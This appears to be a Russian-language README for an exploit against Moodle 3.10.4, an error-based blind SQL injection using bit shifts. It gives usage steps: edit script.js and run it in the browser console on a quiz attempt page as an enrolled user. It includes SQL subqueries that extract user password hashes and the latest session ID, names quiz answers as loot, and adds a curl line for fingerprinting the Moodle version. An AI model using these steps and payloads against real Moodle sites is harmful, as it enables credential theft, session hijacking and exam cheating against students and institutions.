
Слепая SQL-инъекция на основе ошибок с подходом побитового сдвига для Moodle 3.10.4
Слепая SQL-инъекция на основе ошибок с использованием битовых сдвигов для Moodle 3.10.4.
Позволяет злоумышленнику выполнять произвольные запросы к базе данных. Например, вы можете похитить:
ответы на тесты из базы данных
Измените файл script.js и запустите его на маршруте /mod/quiz/attempt.php?attempt=...&cmid=...
хеши паролей пользователей:
(SELECT password FROM mdl_user WHERE id = 2 LIMIT 1)
пользовательские сессии:
(SELECT sid FROM mdl_sessions ORDER BY id DESC LIMIT 1)
Вы должны быть авторизованы и записаны как минимум на один курс. Затем просто скопируйте код из script.js в консоль браузера и запустите его на сайте с уязвимой версией Moodle.
DOMAIN="example.com"
curl -s https://$DOMAIN/lib/upgrade.txt | head